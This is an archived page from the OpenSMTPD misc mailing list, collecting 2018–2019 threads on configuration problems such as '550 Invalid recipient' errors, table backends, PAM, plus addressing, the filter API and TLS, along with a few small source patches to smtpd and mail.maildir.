> > > >addressed to aliases with a reason "550 Invalid recipient". What's
> > > >wrong with new config?
> > > >
> > > >/var/log/maillog:
> > > >
> > > >Apr 29 07:01:48 ns1 smtpd[71399]: e99e9db5916c8789 smtp connected
> > > >address=209.85.167.44 host=mail-lf1-f44.google.com
> > > >Apr 29 07:01:48 ns1 smtpd[71399]: e99e9db5916c8789 smtp tls
> > > >ciphers=TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256
> > > >Apr 29 07:01:49 ns1 smtpd[71399]: e99e9db5916c8789 smtp failed-command
> > > >command="RCPT TO:" result="550 Invalid recipient:
> > > >"
> > > >Apr 29 07:01:49 ns1 smtpd[71399]: e99e9db5916c8789 smtp disconnected 
> > > >reason=quit
> > > >
> > > >smtpd.conf before upgrade to 6.5:
> > > >
> > > >pki mx1. certificate "/etc/ssl/.crt"
> > > >pki mx1. key "/etc/ssl/private/.key"
> > > >
> > > >limit mta inet4
> > > >queue compression
> > > >
> > > 

Re: Relaying to 2 SMTP servers

2019-04-17 Thread Edgar Pettijohn
I think you need to provide more information about your exact requirements.
On Apr 17, 2019 7:51 AM, sel...@linagora.com wrote:
Hi,
I would like to know if it is possible to deliver a mail to 2 SMTP servers using OpenSMTPD.
Thanks for your help & Regards

--  Simon Elbaz @Linagora Mob: +33 (0) 6 38 99 18 34 Tour Franklin 100 Terrasse Boieldieu 92800 Puteaux  


b‹«yÇ¢½çm†+)[yÆ®±ì¨¹ªÞ²æìr¸›yÛhš+¢—§²kivŠàN‹§²æìr¸›zǧu©šŠ[hš+úéì¹»®&Þ¢—§²kivŠà

Re: OpenSMTPD Extras

2019-03-23 Thread Edgar Pettijohn

On Mar 23, 2019 11:22 AM, This  wrote:
>
> I'm running opensmtpd 6.0.3p1-2 on Artix Linux. I'd like to get Extras for sqlite support, so I did everything according to instuctions from here: https://github.com/OpenSMTPD/OpenSMTPD-extras
>
> After some turbulence I got the created path: /usr/libexec/opensmtpd/opensmtpd with some table-[stuff] executable files inside, including the table-sqlite file.
>
> However when I try to use the sqlite scheme in config, I get an error that says:
> smtpd: table_create: backend "sqlite" does not exist
>
> I copied the table-* files from
> /usr/libexec/opensmtpd/opensmtpd
> to
> /usr/libexec/opensmtpd
> but still no go.
>
> What am I missing? Documentation does not cover this.
Could you provide output from:
smtpd -dv
b‹«yÇ¢½çm†+)[yÆ®±ì¨¹ªÞ²æìr¸›yÛhš+¢—§²kivŠàN‹§²æìr¸›zǧu©šŠ[hš+úéì¹»®&Þ¢—§²kivŠà

Re: 550 invalid recipient issue

2019-03-18 Thread Edgar Pettijohn

On Mar 18, 2019 9:53 PM, Gabriele Tofano  wrote:
>
>
> > On Mar 18, 2019, at 9:56 PM, Gabriele Tofano  
> > wrote:
> > 
> > 
> >> On Mar 18, 2019, at 8:06 PM, Thomas Bohl  
> >> wrote:
> >> 
> >>> The configuration loaded is correct as I see the daemon is loading the 
> >>> correct certificates and stuff if launched with smtpd -dv -T smtp. I am 
> >>> very shocked as I am not able to figure out what happened. I never 
> >>> changed any config file since December and I have installed this 
> >>> environment at least 3 times in my lab and was always working. I have 
> >>> forced the daemon to load my config file with -f and the issue persist.
> >> 
> >> At this point I would recreate /usr/local/etc/mail/domains and 
> >> /usr/local/etc/mail/virtuals. Rename the old files.
> >> Start by retyping (no clipboard) one line per file.
> >> 
> >> Reload them via
> >> # smtpctl update table domains
> >> # smtpctl update table virtuals
> >> 
> >> 
> >> You could also test a "catchall"
> >> @ user1
> >> 
> >> -- 
> >> You received this mail because you are subscribed to misc@opensmtpd.org
> >> To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
> >> 
> > 
> > I did what suggested but still providing the message "550 Invalid 
> > recipient”. I am very bummed since I do not understand what could have 
> > changed in terms of config files. They look the same as the originals that 
> > I use to setup new servers.
> > 
> > There is any way to check what is loaded from the config file?
> > 
> > Thank you
> > --
> > You received this mail because you are subscribed to misc@opensmtpd.org
> > To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
> > 
>
> I discovered the below after running a smtpd -dv -Tlookup:
>
> lookup: check "17.58.63.178" as NETADDR in table static: -> 0
> lookup: check "17.58.63.178" as NETADDR in table static: -> found
> lookup: check “domain.com" as DOMAIN in table static: -> found
> lookup: lookup “user1" as USERINFO in table getpwnam: -> 0
>
> Why osmtpd is looking for user1 in table getpwnam? What table is that?

I think it is /etc/passwd 


> --
> You received this mail because you are subscribed to misc@opensmtpd.org
> To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
>
b��yǢ��m�+)[yƮ�쨹�޲��r��y�h�+kiv��N�r��zǧu���[h�+��칻�&ޢ���kiv��

Re: 550 invalid recipient issue

2019-03-16 Thread Edgar Pettijohn

On Mar 16, 2019 5:09 PM, Thomas Bohl  wrote:
>
> > Both files are looking good/same as before and local delivery with sendmail 
> > does not work:
> > 
> > ga...@server.com... Connecting to [127.0.0.1] via relay...
> > 220 mail.server.com ESMTP OpenSMTPD
>  EHLO mail.server.com
> > 250-mail.server.com Hello mail.server.com [127.0.0.1], pleased to meet you
> > 250-8BITMIME
> > 250-ENHANCEDSTATUSCODES
> > 250-SIZE 36700160
> > 250-DSN
> > 250 HELP
>  MAIL From: SIZE=108
> > 250 2.0.0: Ok
>  RCPT To:
> > 550 Invalid recipient
>
> Hm... You said it stopped working after you restarted smtpd.
> Maybe it runs of a wrong config file?
>
> I once accidentally typed "smtpd" in the middle of changing the 
> configuration. Which started a daemonized smtpd with an unfinished 
> config. No matter how often I changed the smtpd.conf and typed "rcctl 
> restart smtpd" the wrong config persisted :-) It toke me about two hours 
> until I realised smtpd was still running after "rcctl stop smtpd".
>
> -- 

You aren't alone. I've done the same.

> You received this mail because you are subscribed to misc@opensmtpd.org
> To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
>


Re: OpenSMTPD with PAM

2019-03-11 Thread Edgar Pettijohn

On Mar 11, 2019 4:43 PM, Bryan Harris  wrote:
>
> When I install it on RHEL 7 I get this file, so maybe it works already.
>
> [root@bi2 ~]# cat /etc/pam.d/smtp.opensmtpd
> #%PAM-1.0
> auth   include    password-auth
> account    include    password-auth
>
> I guess dovecot and PAM is a separate issue.
>
> V/r,
> Bryan
>

I'm not a Pam expert, but I suspect that it would work for dovecot also, just 
the file name would be different.


> On 3/11/2019 5:29 PM, This wrote:
> > Hi there.
> >
> > For two years I've been trying to set up postfix when I finally gave 
> > up on it. Then I found OpenSMTPD and I set it up in two days. This 
> > message is the result of it.
> >
> > I learned that OpenSMTPD supports PAM, however I cannot reach any info 
> > on how is this achieved. Can somebody point me to the right sources or 
> > provide a how-to?
> >
> > Ideally I'd like to get to a point where I have a single passwd file 
> > shared with dovecot.
> >
> >
>
> -- 
> You received this mail because you are subscribed to misc@opensmtpd.org
> To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
>


Re: Upgrade from OpenBSD 6.2-stable to 6.4-stable, new syntax .. mlmmj anyone?

2019-02-05 Thread Edgar Pettijohn

On Feb 5, 2019 5:57 AM, Tor Houghton  wrote:
>
> Hello,
>
> In 6.2 smtpd.conf, I had the following syntax for delivery to mlmmj:
>
> accept from any for domain  virtual  \
>   deliver to mda "/usr/local/bin/mlmmj-recieve -L 
> /var/spool/mlmmj/%{rcpt.user:lowercase|strip}/"
>

Try:

action "mlmmj" mda "/usr/local/bin/mlmmj-recieve -L 
/var/spool/mlmmj/%{rcpt.user:lowercase|strip}/" virtual 

match from any for domain  action "mlmmj"


> I understand I now need to split this into and "action" and a "match" line, 
> but I'm having issues .. 
>
> All help appreciated!
>
> Kind regards,
>
> Tor
>
>
> -- 
> You received this mail because you are subscribed to misc@opensmtpd.org
> To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
>


Re: Support of plus character in email address

2019-01-02 Thread Edgar Pettijohn

On Jan 2, 2019 9:43 AM, mabi  wrote:
>
> ‐‐‐ Original Message ‐‐‐
> On Wednesday, January 2, 2019 3:16 PM, Edgar Pettijohn 
>  wrote:
>
> > I recently switched to dspam. It ties into smtpd very similarly to amavis 
> > Plus it doesn't appear to need the additional  table, and 
> > delimeters still work out of the box. Everything you need to know is 
> > included in the README plus the specific readme for postgres backend.
>
> I heard good things too about dspam, call me crazy maybe but for me Amavis in 
> combination with ClamAV and SpamAssassin has been doing a great job.
>
> > I'm pretty sure that's why I stopped using amavis originally. It is very 
> > easy cause problems.
>
> I just would like to precise here that it is not Amavis the source of the 
> "problem" in my specific case here but the fact that using an rcpt-to with a 
> recipients table in a match rule does not take in account e-mail addresses 
> containing a plus character. In my opinion it should allow e-mail adresses 
> with a plus or at least it should be a boolean parameter which one can turn 
> on/off in smtpd.conf.
>
> @Gilles maybe you have any comments about that?

https://www.postgresql.org/docs/9.3/functions-matching.html

You will likely need to use some of the regex functions to pull out the user 
and domain from 
$1.b��yǢ��m�+)[yƮ�쨹�޲��r��y�h�+kiv��N�r��zǧu���[h�+��칻�&ޢ���kiv��

Re: Support of plus character in email address

2019-01-02 Thread Edgar Pettijohn

On Jan 2, 2019 7:41 AM, mabi  wrote:
>
> ‐‐‐ Original Message ‐‐‐
> On Wednesday, January 2, 2019 1:53 PM, Oscar Carlsson  
> wrote:
>
> > As far as I know sub-addressing is enabled by default. I haven't found
> > anything in my configuration that explicitly enables it, but it works
> > out of the box here.
>
> That's also what I thought by checking the smtpd.conf man page but I presume 
> my issue here is that I use a recipients table in order to check if an e-mail 
> address is valid or not before sending to Amavis and then Dovecot. The 
> relevant part of my smtpd.conf file looks like this:
>
> table recipients postgres:/etc/mail/postgresql.conf
> match from any for domain  rcpt-to  action "relay_amavis"
>
> So here I presume that the rcpt-to option of match does not support having a 
> "+" in the e-mail address.
>
> A workaround would be having to manually define the valid "+" recipients in 
> my recipients table but that really sound stupid and is not very useful...
>

I recently switched to dspam. It ties into smtpd very similarly to amavis. Plus 
it doesn't appear to need the additional  table, and delimeters 
still work out of the box. Everything you need to know is included in the 
README plus the specific readme for postgres backend. 

Might be worth a look. Plus it doesn't seem to be such a memory hog as the perl 
alternatives.

I'm pretty sure that's why I stopped using amavis originally. It is very easy 
cause problems.

Edgar

b��yǢ��m�+)[yƮ�쨹�޲��r��y�h�+kiv��N�r��zǧu���[h�+��칻�&ޢ���kiv��

Re: Thoughts and queries (n=1) on the filter API

2018-12-23 Thread Edgar Pettijohn

On Dec 23, 2018 5:27 AM, Gilles Chehade  wrote:
>
> On Sun, Dec 23, 2018 at 12:06:02PM +0100, Aham Brahmasmi wrote:
> > Bonjour Monsieur Gilles,
> > 
> > Merci beaucoup for your exhaustive explanations.
> > 
> > > > 1) What is the difference between the "report" and "filter" prefixes?
> > > > My current understanding is that "report" is oriented towards reporting
> > > > and "filter" is oriented towards writing filters.
> > > >
> > > 
> > > very simple:
> > > 
> > > - event reporting lets smtpd notify filters of any event that leads to
> > >   a change in the SMTP session, they are informative and do not accept
> > >   any answer.
> > > 
> > > - event filtering lets smtpd notify filters of any event that leads to
> > >   a decision in the SMTP session, they are decisive and require that a
> > >   filter provides a decision.
> > > 
> > > report lines are one way from smtpd to filters, filters must not reply
> > > 
> > > filter lines are two way between smtpd and filters, for any request an
> > > answer is required.
> > > 
> > > both reporting and filtering are "subscribed" so filters will only get
> > > the events they subscribed to.
> > 
> > So in case one wants to reject a session based only on reporting events,
> > one still has to wait till the filter events start coming in. Or one
> > could write a built-in like fcrdns. Is this correct?
> >  
>
> To reject a session based only on reporting events, you should subscribe
> to the relevant events in order to gather the info you want, then to one
> filter event to actually perform the action of rejecting.
>
> For example, I could subscribe to tx-connect, tx-helo and tx-ehlo to get
> source address, rdns, fcrdns and helo name from reporting events, but to
> reject the session based on this information I must decide when I want a
> rejection (do i want to reject at MAIL FROM ? RCPT TO ? DATA ? COMMIT ?)
> and register for appropriate filter event to actually reject a session.
>
> Builtin filters are a bit special because we are going to be VERY, VERY,
> VERY selective about them. Anything that can be done with a builtin, can
> be done with a proc filter and proc filters don't run in the same memory
> space so ... a good approach is to write a proc filter and if we find it
> makes sense to convert to a builtin, it can be discussed.
>
>
> > > > 3) Are there time limits for a filter to return response?
> > > >
> > > 
> > > time limits are not implemented yet, but yes there will be a time limit,
> > > very likely related to the SMTP session timeouts.
> > > 
> > > it's not tricky to implement, it'll be a notification sent to the filter
> > > that the last query timed-out and it shouldn't respond anymore.
> > > 
> > > this will result in a Temporary Failure in the SMTP session, filters are
> > > not allowed to exceed that timeout.
> > 
> > So if in a chain {f1,f2,f3}, if f2 takes too much time to respond, both
> > f1 and f3 will be notified of the session timeout.
> > 
>
> yes, definitely.
>
> in filter chains, all filters always receive all _reporting_ events.
>
> this is a reason why report and filters are separate, if you look at the
> connect phase, all filters will receive the tx-connect report event THEN
> the connect filter event is triggered and all filters may not receive it
> because first filter may reject. if it rejects, then the reporting event
> tx-disconnected is sent to all filters.
>
> the action of a filter will never prevent all filters from receiving the
> report events.
>
>
> > > > 5) Could we have the filter builtin for helo be different from the
> > > > ehlo? It might be instructional to understand that the client asked
> > > > for ehlo.
> > > > { FILTER_EHLO, "ehlo", filter_builtins_helo },
> > > 
> > > it is already the case, helo and ehlo are different filter hooks:
> > > 
> > >    filter foo1 builtin helo [...]
> > >    filter foo1 builtin ehlo [...]
> > > 
> > > the same applies for proc filters, they can subscribe to helo and ehlo
> > > as different filtering events.
> > 
> > I may be wrong here, but I was unable to find a filter_builtins_ehlo in
> > the code. From lka_filter.c
> > ..
> > static int filter_builtins_notimpl(struct filter_session *, struct filter 
> > *, uint64_t, const char *);
> > static int filter_builtins_connect(struct filter_session *, struct filter 
> > *, uint64_t, const char *);
> > static int filter_builtins_helo(struct filter_session *, struct filter *, 
> > uint64_t, const char *);
> > static int filter_builtins_mail_from(struct filter_session *, struct filter 
> > *, uint64_t, const char *);
> > static int filter_builtins_rcpt_to(struct filter_session *, struct filter 
> > *, uint64_t, const char *);
> > ..
> > { FILTER_CONNECT, "connect", filter_builtins_connect },
> > { FILTER_HELO, "helo", filter_builtins_helo },
> > { FILTER_EHLO, "ehlo", filter_builtins_helo },
> > { FILTER_STARTTLS, "starttls", filter_builtins_notimpl },
> > ..
> > 
>
> yes, the same implementation of the builtin is used so I 

Re: Rule to prevent spam from my domain

2018-12-19 Thread Edgar Pettijohn
On Wed, Dec 19, 2018 at 11:37:31PM +, Mik J wrote:
> Hello,
> 
> I have wrote rules for my opensmtpd but some spams are passing through.
> 
> The ones that I go through have a source like em...@mydomain.org and are sent 
> to i...@mydomain.org
> I'm wondering if some of you have written this kind of rule ?
> 
> reject from source ! sender  for domain 
> 
> 
> Regards

Please provide your /etc/mail/smtpd.conf

And perhaps some logs where the spammers are getting through.

You shouldn't allow your server to be used as a relay without authentication.

Edgar

-- 
You received this mail because you are subscribed to misc@opensmtpd.org
To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org



Re: Issues with Thunderbird and STARTTLS (Pipelining not supported)

2018-12-17 Thread Edgar Pettijohn

On Dec 17, 2018 6:49 AM, Matt Schwartz  wrote:
>
> Right off the bat, I think the mask-src might be causing a problem. I know that Thunderbird does some weird stuff and it doesn't play well with OpenSMTPD's correct implementation of smtps but you're using starttls. So instead of mask-src, try using the hostname parameter and set it to the hostname that you want to use.
>
> On Mon, Dec 17, 2018, 7:31 AM mabi 
>>
>> Right, I forgot that sorry. Here it is:
>>
>> pki mail.mydomain.org cert "/etc/ssl/mail.mydomain.org.crt"
>> pki mail.mydomain.org key "/etc/ssl/private/mail.mydomain.org.key"
>>
>> table aliases file:/etc/mail/aliases
>> table domains postgres:/etc/mail/postgresql.conf
>> table virtuals postgres:/etc/mail/postgresql.conf
>> table credentials postgres:/etc/mail/postgresql.conf
>>
>> listen on egress port 25  hostname mail.mydomain.org tls pki mail.mydomain.org
>> listen on egress port 587 hostname mail.mydomain.org tls-require pki mail.mydomain.org auth  mask-src
>>
>> action "local" mbox alias 
>> action "relay" relay
>> action "lmtp_dovecot" lmtp "/var/dovecot/lmtp" rcpt-to virtual 
>>
>> match for local action "local"
>> match from any for domain  action "lmtp_dovecot"
>> match auth from any for any action "relay"
>>
>>
>>
>> ‐‐‐ Original Message ‐‐‐
>> On Monday, December 17, 2018 1:21 PM, Matt Schwartz  wrote:
>>
>>> Please share your smtpd.conf file. OpenSMTPD 6.4.1 works just fine with Thunderbird.
>>>
>>> On Mon, Dec 17, 2018, 7:16 AM mabi 

 Hi,

 I just configured OpenSMTPD on OpenBSD 6.4 with authentication to send mails as a MSA (port 587). I did some tests with swaks and TLS enabled and it works fine but with Thunderbird it miserably fails to use STARTTLS. On the server side I get:

 500 5.5.1 Invalid command: Pipelining not supported

 Is Thunderbird somehow so broken that it doesn't even respect that OpenSMTPD does not support SMTP pipelining?

 I am using Thunderbird 60.3.0...

 Any workarounds?

 Also I was wondering if OpenSMTPD supports other authentication types additionally to PLAIN and LOGIN?

 Regards,
 Mabi







 -- 
 You received this mail because you are subscribed to misc@opensmtpd.org
 To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org

>>
I recently had a typo causing the wrong pki certs to be used and for some reason the logs were complaining about pipelining. Perhaps test with openssl s_client if the certs could potentially be the problem.
Edgar


Re: FAQ gone?

2018-12-12 Thread Edgar Pettijohn
I feel the manual pages are really enough. However, somesort of wiki that
the userbase could keep updated without intervention may work out.

Edgar

-- 
You received this mail because you are subscribed to misc@opensmtpd.org
To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org



Re: parse.y patch

2018-12-03 Thread Edgar Pettijohn

On Dec 3, 2018 3:57 AM, Gilles Chehade  wrote:
>
> On Sun, Dec 02, 2018 at 07:02:14PM -0600, Edgar Pettijohn wrote:
> > I think this was probably an oversight.
> > 
>
> no, this wasn't an oversight.
>
> the new grammar used TAG, not TAGGED which will be removed
>

:( Tagged reads better. No worries though. I saw the TAGGED keyword still there 
so I was hoping it was accidental.

>
> > Index: parse.y
> > ===
> > RCS file: /cvs/src/usr.sbin/smtpd/parse.y,v
> > retrieving revision 1.232
> > diff -u -p -u -r1.232 parse.y
> > --- parse.y 30 Nov 2018 15:33:40 - 1.232
> > +++ parse.y 3 Dec 2018 01:00:45 -
> > @@ -921,7 +921,7 @@ ACTION STRING {
> >  ;
> >  
> >  match_option:
> > -negation TAG tables {
> > +negation TAGGED tables {
> >  struct table   *t = $3;
> >  
> >  if (rule->flag_tag) {
> > 
> > -- 
> > You received this mail because you are subscribed to misc@opensmtpd.org
> > To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
> > 
>
> -- 
> Gilles Chehade    @poolpOrg
>
> https://www.poolp.org tip me: https://paypal.me/poolpOrg
b��yǢ��m�+)[yƮ�쨹�޲��r��y�h�+kiv��N�r��zǧu���[h�+��칻�&ޢ���kiv��

Re: parse.y patch + smtpd.conf.5 patch

2018-12-02 Thread Edgar Pettijohn
I guess I should have included the smtpd.conf(5) patch as well. 
Plus remove trailing whitspace.

Index: smtpd.conf.5
===
RCS file: /cvs/src/usr.sbin/smtpd/smtpd.conf.5,v
retrieving revision 1.206
diff -u -p -u -r1.206 smtpd.conf.5
--- smtpd.conf.58 Oct 2018 06:10:17 -   1.206
+++ smtpd.conf.53 Dec 2018 03:08:02 -
@@ -269,7 +269,7 @@ Server certificates for those protocols 
 Require TLS to be used when relaying, using mandatory STARTTLS by default.
 When used with a smarthost, the protocol must not be
 .Dq smtp+notls:// .
-If 
+If
 .Op no-verify
 is specified, do not require a valid certificate.
 .It Cm auth Pf < Ar table Ns >
@@ -540,7 +540,7 @@ Specify that transaction's RCPT TO shoul
 .Ar recipient .
 .It Xo
 .Op Ic \&!
-.Cm tag Ar tag
+.Cm tagged Ar tag
 .Xc
 Matches transactions tagged with the given
 .Ar tag .

On Sun, Dec 02, 2018 at 07:02:14PM -0600, Edgar Pettijohn wrote:
> I think this was probably an oversight.
> 
> Index: parse.y
> ===
> RCS file: /cvs/src/usr.sbin/smtpd/parse.y,v
> retrieving revision 1.232
> diff -u -p -u -r1.232 parse.y
> --- parse.y   30 Nov 2018 15:33:40 -  1.232
> +++ parse.y   3 Dec 2018 01:00:45 -
> @@ -921,7 +921,7 @@ ACTION STRING {
>  ;
>  
>  match_option:
> -negation TAG tables {
> +negation TAGGED tables {
>   struct table   *t = $3;
>  
>   if (rule->flag_tag) {
> 
> -- 
> You received this mail because you are subscribed to misc@opensmtpd.org
> To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
> 

-- 
You received this mail because you are subscribed to misc@opensmtpd.org
To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org



parse.y patch

2018-12-02 Thread Edgar Pettijohn
I think this was probably an oversight.

Index: parse.y
===
RCS file: /cvs/src/usr.sbin/smtpd/parse.y,v
retrieving revision 1.232
diff -u -p -u -r1.232 parse.y
--- parse.y 30 Nov 2018 15:33:40 -  1.232
+++ parse.y 3 Dec 2018 01:00:45 -
@@ -921,7 +921,7 @@ ACTION STRING {
 ;
 
 match_option:
-negation TAG tables {
+negation TAGGED tables {
struct table   *t = $3;
 
if (rule->flag_tag) {

-- 
You received this mail because you are subscribed to misc@opensmtpd.org
To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org



Re: Mail loops when relaying and using smtp auth

2018-11-28 Thread Edgar Pettijohn
I think the full config minus pki stuff would be useful. Till then look at 
tags. It may be useful. 

listen on 587 auth ... tag authed

accept tagged authed ...
On Nov 28, 2018 5:32 PM, Thomas Smith  wrote:
>
> Hi,
>
> I’m running OpenSMTPd on OpenBSD 6.3.
>
> The server is used primarily as a mail filtering relay, filtering with spamd; 
> however, it’s also used, on a more limited bases, to send outbound emails.
>
> If I’m only relaying email for domain.com, relaying works fine. In this 
> context, an external user would send an email to u...@domain.com, that email 
> would pass through this server first, then it would be delivered upstream.
>
> It’s this second context that causes issues…
>
> If user1 attempts to send an outbound email through this server—that is, 
> user1 is authenticating to this server for the sole purpose of sending an 
> email—and sends that email to u...@domain.com, I end up with a mail loop 
> since the server itself is listed as the MX for domain.com.
>
> My question is this…
>
> It is possible to configure OpenSMTPd to detect this scenario and to know 
> that it should relay that email to domain.com rather than trying to deliver 
> it to its MX server, which happens to be the server itself?
>
> Here’s a very abridged version of my config, showing the relay and 
> authentication configurations:
>
> accept from any for domain  relay via  # relay config
> listen on egress port 587 tls-require auth  hostname 
> $smtp_domain pki $smtp_domain # outbound smtp auth config
>
> If the answer to my question is that this isn’t possible, can someone 
> recommend an alternative way of configuring OpenSMTPd to make it work? The 
> objective would be to provide both of these services on the same server, 
> instead of separate servers.
>
> Thank you,
>
> ~ Tom
>
> --
> You received this mail because you are subscribed to misc@opensmtpd.org
> To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org
>


Re: mail.maildir junk patches

2018-11-25 Thread Edgar Pettijohn

On Nov 25, 2018 8:24 AM, Gilles Chehade  wrote:
>
> There seems to be something wrong with your mail encoding, the diff is
> barely readable for me, spaces are replaced with '?' :-/
>
Damn you Thunderbird!
> I'm wondering if we couldn't just test 'X-Spam' and 'X-Spam-Flag'.
>
> I don't really see value in adding the header to check in grammar then
> passing it to the mda when when the Junk case is very isolated and can
> be covered with a couple strcasecmp() calls.
>
> If X-Spam-Flag had been part of the junk test in mail.maildir.c, would
> this diff still had been written ? to cover which case ?
>
> Gilles
>
I had considered this also, then thought there may be other unknown cases that 
this would cover in advance. I will rewrite and resend.
>
> On Sat, Nov 24, 2018 at 11:02:41AM -0600, Edgar Pettijohn III wrote:
> > make the junk header customizable like so:
> > 
> > action "local" maildir junk "X-Spam-Flag: YES"
> > 
> > 
> > Index: mail.maildir.8
> > ===
> > RCS file: /cvs/src/usr.sbin/smtpd/mail.maildir.8,v
> > retrieving revision 1.5
> > diff -u -p -u -r1.5 mail.maildir.8
> > --- mail.maildir.8?? 30 May 2018 12:37:57 -?? 1.5
> > +++ mail.maildir.8?? 24 Nov 2018 16:58:03 -
> > @@ -22,7 +22,7 @@
> > ??.Nd store mail in a maildir
> > ??.Sh SYNOPSIS
> > ??.Nm mail.maildir
> > -.Op Fl j
> > +.Op Fl j header
> > ??.Op Ar pathname
> > ??.Sh DESCRIPTION
> > ??.Nm
> > @@ -36,7 +36,9 @@ located in the user's home directory.
> > ??The options are as follows:
> > ??.Bl -tag -width Ds
> > ??.It Fl j
> > -Scan message for X-Spam and move to Junk folder if result is positive.
> > +Scan message for
> > +.Ar header
> > +and move to Junk folder if result is positive.
> > ??.El
> > ??.Sh EXIT STATUS
> > ??.Ex -std mail.maildir
> > Index: mail.maildir.c
> > ===
> > RCS file: /cvs/src/usr.sbin/smtpd/mail.maildir.c,v
> > retrieving revision 1.7
> > diff -u -p -u -r1.7 mail.maildir.c
> > --- mail.maildir.c?? 24 Oct 2018 19:26:23 -?? 1.7
> > +++ mail.maildir.c?? 24 Nov 2018 16:58:03 -
> > @@ -37,23 +37,25 @@
> > 
> > ??static int?? maildir_subdir(const char *, char *, size_t);
> > ??static void?? maildir_mkdirs(const char *);
> > -static void?? maildir_engine(const char *, int);
> > +static void?? maildir_engine(const char *, int, const char *);
> > ??static int?? mkdirs_component(const char *, mode_t);
> > ??static int?? mkdirs(const char *, mode_t);
> > 
> > ??int
> > ??main(int argc, char *argv[])
> > ??{
> > -?? int?? ch;
> > -?? int?? junk = 0;
> > +?? int?? ??ch;
> > +?? int?? ??junk = 0;
> > +?? char?? *header = NULL;
> > 
> >  if (! geteuid())
> >  ?? errx(1, "mail.maildir: may not be executed as root");
> > 
> > -?? while ((ch = getopt(argc, argv, "j")) != -1) {
> > +?? while ((ch = getopt(argc, argv, "j:")) != -1) {
> >  ?? switch (ch) {
> >  ?? case 'j':
> >  ?? ?? junk = 1;
> > +?? ?? ?? header = optarg;
> >  ?? ?? break;
> >  ?? default:
> >  ?? ?? break;
> > @@ -65,7 +67,7 @@ main(int argc, char *argv[])
> >  if (argc > 1)
> >  ?? errx(1, "mail.maildir: only one maildir is allowed");
> > 
> > -?? maildir_engine(argv[0], junk);
> > +?? maildir_engine(argv[0], junk, header);
> > 
> >  return (0);
> > ??}
> > @@ -107,7 +109,7 @@ maildir_mkdirs(const char *dirname)
> > ??}
> > 
> > ??static void
> > -maildir_engine(const char *dirname, int junk)
> > +maildir_engine(const char *dirname, int junk, const char *header)
> > ??{
> >  char?? rootpath[PATH_MAX];
> >  char?? junkpath[PATH_MAX];
> > @@ -182,7 +184,7 @@ maildir_engine(const char *dirname, int
> >  ?? line[strcspn(line, "\n")] = '\0';
> >  ?? if (line[0] == '\0')
> >  ?? ?? in_hdr = 0;
> > -?? ?? if (junk && in_hdr && strcmp(line, "X-Spam: yes") == 0)
> > +?? ?? if (junk && in_hdr && strcmp(line, header) == 0)
> >  ?? ?? is_junk = 1;
> > 

smtpd.c patch

2018-11-24 Thread Edgar Pettijohn III

pledge flock doesn't seem necessary any longer?

Index: smtpd.c
===
RCS file: /cvs/src/usr.sbin/smtpd/smtpd.c,v
retrieving revision 1.306
diff -u -p -u -r1.306 smtpd.c
--- smtpd.c    16 Nov 2018 20:55:59 -    1.306
+++ smtpd.c    25 Nov 2018 02:02:57 -
@@ -1070,8 +1070,8 @@ smtpd(void) {

 purge_task();

-    if (pledge("stdio rpath wpath cpath fattr flock tmppath "
-        "getpw sendfd proc exec id inet unix", NULL) == -1)
+    if (pledge("stdio rpath wpath cpath fattr tmppath getpw "
+        "sendfd proc exec id inet unix", NULL) == -1)
     err(1, "pledge");

 event_dispatch();


--
You received this mail because you are subscribed to misc@opensmtpd.org
To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org



Re: tls debugging

2018-11-24 Thread Edgar Pettijohn III



On 11/22/18 1:11 AM, Gilles Chehade wrote:

On Tue, Nov 13, 2018 at 09:59:29PM -0600, Edgar Pettijohn III wrote:

I have the following line on my laptops smtpd.conf:

action "relay" relay host "smtp+tls//label@domain:587" auth  tls
no-verify

I had to add the no-verify for some reason with the upgrade to 6.4. I was
trying to figure out why tls was failing, so I started testing with openssl
s_client and it wasn't being very useful. I looked at the logs on the server
and this is what it shows:

Nov 13 21:47:40 mail smtpd[37181]: bee1391f24a23978 smtp failed-command
address=50.55.65.87 host=50.55.65.87 command="pipelining" result="500 5.5.1
Invalid command: Command unrecognized"
Nov 13 21:47:50 mail smtpd[37181]: bee1391f24a23978 smtp disconnected
address=50.55.65.87 host=50.55.65.87 reason=disconnect

I'm not sure if this is an smtpd bug or an s_client bug or neither.


without the command line you used, i can only take guesses.

the sample config line you show hints that the host you're connecting to
supports TLS through the STARTTLS extension so you have to establish the
connection using plain SMTP then upgrade to TLS.

the pipelining error hints that the SMTP protocol was not respected when
your client connected, which makes me assume you didn't connect in plain
and upgrade to TLS but you connected and issued a TLS negotiation out of
the blue (aka. SMTPS).

so I guess you used something like:

   $ openssl s_client -host 50.55.65.87 -port 587

instead of:

   $ openssl s_client -host 50.55.65.87 -port 587 -starttls smtp




Yep I forgot -starttls smtp :)

--
You received this mail because you are subscribed to misc@opensmtpd.org
To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org



mail.maildir junk patches

2018-11-24 Thread Edgar Pettijohn III

make the junk header customizable like so:

action "local" maildir junk "X-Spam-Flag: YES"


Index: mail.maildir.8
===
RCS file: /cvs/src/usr.sbin/smtpd/mail.maildir.8,v
retrieving revision 1.5
diff -u -p -u -r1.5 mail.maildir.8
--- mail.maildir.8    30 May 2018 12:37:57 -    1.5
+++ mail.maildir.8    24 Nov 2018 16:58:03 -
@@ -22,7 +22,7 @@
 .Nd store mail in a maildir
 .Sh SYNOPSIS
 .Nm mail.maildir
-.Op Fl j
+.Op Fl j header
 .Op Ar pathname
 .Sh DESCRIPTION
 .Nm
@@ -36,7 +36,9 @@ located in the user's home directory.
 The options are as follows:
 .Bl -tag -width Ds
 .It Fl j
-Scan message for X-Spam and move to Junk folder if result is positive.
